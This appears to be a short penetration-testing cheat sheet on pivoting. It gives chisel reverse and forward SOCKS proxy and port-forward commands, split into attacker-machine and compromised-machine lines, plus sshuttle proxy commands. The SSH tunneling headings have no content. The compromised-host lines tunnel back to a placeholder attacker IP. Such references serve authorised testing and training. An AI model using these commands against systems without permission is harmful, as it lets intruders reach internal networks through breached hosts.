Port Forwarding

Chisel - Reverse SOCKS proxy

Attacking machine: ./chisel server -p LISTEN_PORT --reverse &
Compromised machine: ./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

Chisel - Forward SOCKS proxy

Attacking machine: ./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks
Compromised machine: ./chisel server -p LISTEN_PORT --socks5

Chisel - Remote port forward

Attacking machine: ./chisel server -p LISTEN_PORT --reverse &
Compromised machine: ./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

Chisel - Local port forward

Attacking machine: ./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
Compromised machine: ./chisel server -p LISTEN_PORT

Sshuttle proxy

Attacking machine: sshuttle -r username@address subnet

Sshuttle proxy with command execution

Attacking machine: sshuttle -r user@address --ssh-cmd "ssh -i KEYFILE" SUBNET

Sshuttle proxy if compromised host is in the same subnet we are trying to gain access to

Attacking machine: sshuttle -r user@172.16.0.5 172.16.0.0/24 -x 172.16.0.5

SSH Tunneling

SSH Proxy Tunnel

SSH Reverse Tunnel

Last updated

Was this helpful?